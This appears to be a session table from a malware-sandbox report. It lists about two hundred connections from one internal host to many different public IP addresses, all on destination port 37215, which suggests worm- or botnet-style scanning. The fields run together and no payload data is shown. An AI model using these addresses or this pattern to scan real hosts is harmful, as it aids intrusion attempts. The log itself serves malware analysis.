                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18085192.168.2.1359190197.207.29.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18086192.168.2.1358720197.156.232.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18087192.168.2.1337032197.104.176.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18088192.168.2.1345694197.210.229.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18089192.168.2.1357998197.132.1.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18090192.168.2.1347424157.104.11.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18091192.168.2.135239041.210.163.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18092192.168.2.1349538197.198.43.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18093192.168.2.1349048157.93.113.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18094192.168.2.133345841.88.102.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18095192.168.2.1350520160.193.240.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18096192.168.2.1336460197.253.63.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18097192.168.2.1342474136.148.104.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18098192.168.2.133967241.238.33.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18099192.168.2.1336014157.155.167.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18100192.168.2.134081082.64.196.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18101192.168.2.1360964210.20.234.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18102192.168.2.134860441.201.217.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18103192.168.2.1349782222.48.221.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18104192.168.2.135107214.20.15.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18105192.168.2.1355160197.103.4.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18106192.168.2.1354406197.201.151.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18107192.168.2.1335062105.164.247.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18108192.168.2.134843857.98.60.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18109192.168.2.1339706167.31.93.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18110192.168.2.133480289.87.187.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18111192.168.2.1348616139.38.209.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18112192.168.2.1341746157.200.145.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18113192.168.2.134185641.253.159.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18114192.168.2.1357288197.12.163.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18115192.168.2.1343408197.194.215.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18116192.168.2.1337588197.161.159.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18117192.168.2.1346038172.96.89.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18118192.168.2.135241832.212.151.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18119192.168.2.1342514124.105.174.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18120192.168.2.134387291.73.136.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18121192.168.2.1352382157.141.4.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18122192.168.2.1358106157.197.157.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18123192.168.2.1344754197.60.25.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18124192.168.2.1335410177.100.226.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18125192.168.2.1357360204.166.68.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18126192.168.2.1348188157.75.214.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18127192.168.2.1358072197.172.229.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18128192.168.2.1357328197.100.146.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18129192.168.2.1353780157.86.154.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18130192.168.2.135845041.217.244.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18131192.168.2.1338654157.65.48.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18132192.168.2.1352876175.67.215.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18133192.168.2.134101441.51.63.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18134192.168.2.135852619.57.57.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18135192.168.2.134385041.235.39.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18136192.168.2.134776241.21.133.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18137192.168.2.13344861.130.241.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18138192.168.2.1352420157.231.176.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18139192.168.2.1346298197.158.128.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18140192.168.2.1350824157.230.39.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18141192.168.2.1349088197.203.215.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18142192.168.2.1357376168.167.225.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18143192.168.2.1351884157.77.210.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18144192.168.2.1339726157.249.236.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18145192.168.2.133519241.198.110.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18146192.168.2.1348034154.31.189.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18147192.168.2.1351198197.232.53.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18148192.168.2.1345662197.110.227.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18149192.168.2.1336028157.13.248.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18150192.168.2.1334558197.249.56.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18151192.168.2.1338246197.147.163.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18152192.168.2.134669041.228.188.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18153192.168.2.1354998157.239.117.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18154192.168.2.1333706192.15.78.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18155192.168.2.133755641.49.26.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18156192.168.2.1340354104.15.154.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18157192.168.2.1342238157.128.240.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18158192.168.2.133823641.215.47.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18159192.168.2.133833841.140.228.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18160192.168.2.1347332197.225.9.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18161192.168.2.1357572157.147.44.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18162192.168.2.1340746128.9.88.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18163192.168.2.1348952197.141.128.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18164192.168.2.1342566197.72.150.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18165192.168.2.1350584157.97.9.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18166192.168.2.1343944157.137.65.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18167192.168.2.1351646119.207.128.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18168192.168.2.134084260.54.60.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18169192.168.2.1350290157.143.78.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18170192.168.2.133847441.66.185.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18171192.168.2.1339580135.173.101.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18172192.168.2.133512437.115.31.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18173192.168.2.133769264.77.210.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18174192.168.2.133890041.51.88.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18175192.168.2.1339244157.61.88.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18176192.168.2.1339882197.209.103.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18177192.168.2.13396902.74.123.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18178192.168.2.133550441.213.49.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18179192.168.2.135225041.238.77.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18180192.168.2.135758441.178.215.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18181192.168.2.135316491.168.149.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18182192.168.2.134597841.128.209.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18183192.168.2.1340560197.38.21.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18184192.168.2.1358024157.102.61.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18185192.168.2.135041880.81.92.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18186192.168.2.133724641.30.93.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18187192.168.2.1344464157.71.124.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18188192.168.2.133278041.189.204.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18189192.168.2.135949841.221.113.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18190192.168.2.1354340157.234.101.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18191192.168.2.1358750128.99.199.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18192192.168.2.1333036186.161.133.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18193192.168.2.1346526171.88.124.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18194192.168.2.1354468157.209.89.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18195192.168.2.135458836.84.254.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18196192.168.2.1356576197.213.14.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18197192.168.2.1341036197.111.74.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18198192.168.2.1359406197.78.238.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18199192.168.2.1356632197.128.1.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18200192.168.2.1350386157.164.167.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18201192.168.2.1338302157.115.109.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18202192.168.2.1346002157.178.81.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18203192.168.2.1334880197.232.140.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18204192.168.2.135048241.182.78.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18205192.168.2.1357192197.253.157.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18206192.168.2.1357602197.128.15.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18207192.168.2.1349910157.148.30.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18208192.168.2.134596641.6.49.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18209192.168.2.133310641.47.66.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18210192.168.2.1348950197.137.151.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18211192.168.2.1349980194.231.147.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18212192.168.2.1343834157.137.27.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18213192.168.2.133633441.127.76.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18214192.168.2.135400678.204.59.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18215192.168.2.1349816141.101.185.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18216192.168.2.134116041.71.79.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18217192.168.2.135118871.4.74.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18218192.168.2.1342342157.132.181.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18219192.168.2.1346796179.108.93.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18220192.168.2.1337690220.201.41.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18221192.168.2.134273492.56.244.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18222192.168.2.1333600109.163.180.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18223192.168.2.135020831.243.53.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18224192.168.2.1349280197.9.236.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18225192.168.2.1340856209.235.106.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18226192.168.2.135318041.154.123.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18227192.168.2.133725841.212.166.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18228192.168.2.1333418157.4.211.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18229192.168.2.1341686197.215.115.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18230192.168.2.133467841.212.55.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18231192.168.2.134729241.28.65.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18232192.168.2.1356478157.102.251.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18233192.168.2.1342306157.44.197.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18234192.168.2.135147641.103.220.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18235192.168.2.134565641.43.51.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18236192.168.2.1338448158.24.48.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18237192.168.2.1358364197.36.162.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18238192.168.2.1351514157.171.118.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18239192.168.2.1357872157.244.171.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18240192.168.2.135413241.201.87.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18241192.168.2.1357200160.25.5.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18242192.168.2.134696441.245.35.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18243192.168.2.134964641.100.85.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18244192.168.2.134813087.199.56.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18245192.168.2.135801841.143.219.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18246192.168.2.1346292197.20.60.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18247192.168.2.1349322157.170.21.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18248192.168.2.1357670101.108.28.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18249192.168.2.134713641.153.226.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18250192.168.2.1347382197.228.73.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18251192.168.2.1339310157.92.36.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18252192.168.2.1359192157.181.183.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18253192.168.2.134062841.15.159.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18254192.168.2.133967671.183.126.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18255192.168.2.1353914197.35.178.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18256192.168.2.135485441.252.153.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18257192.168.2.1344834197.111.200.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18258192.168.2.1360984197.68.192.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18259192.168.2.1354076197.131.17.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18260192.168.2.1336810197.104.74.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18261192.168.2.1348922197.149.233.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18262192.168.2.1340482197.210.123.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18263192.168.2.134693642.36.222.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18264192.168.2.134165478.132.251.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18265192.168.2.1348356157.220.133.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18266192.168.2.1339724171.25.98.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18267192.168.2.134239241.153.160.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18268192.168.2.134544441.124.69.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18269192.168.2.1356788157.254.160.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18270192.168.2.135799841.56.136.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18271192.168.2.1336534157.15.189.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18272192.168.2.134312498.162.11.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18273192.168.2.133454441.209.220.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18274192.168.2.135837241.19.168.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18275192.168.2.1340576157.123.57.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18276192.168.2.135401641.103.247.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18277192.168.2.1339378197.171.235.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18278192.168.2.1357840174.82.211.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18279192.168.2.1339816197.26.177.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18280192.168.2.1336874197.181.13.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18281192.168.2.1350136197.66.63.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18282192.168.2.135330667.106.193.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18283192.168.2.1344598197.153.47.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18284192.168.2.1335974157.233.80.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18285192.168.2.1360124197.244.181.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18286192.168.2.135543041.53.252.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18287192.168.2.1346038197.154.49.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18288192.168.2.1352158169.3.118.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18289192.168.2.1334726157.132.55.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18290192.168.2.1335446177.213.145.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18291192.168.2.134387641.113.243.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18292192.168.2.1339260197.219.184.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18293192.168.2.1344226157.225.12.20037215
                                                  TimestampBytes transferredDirectionData


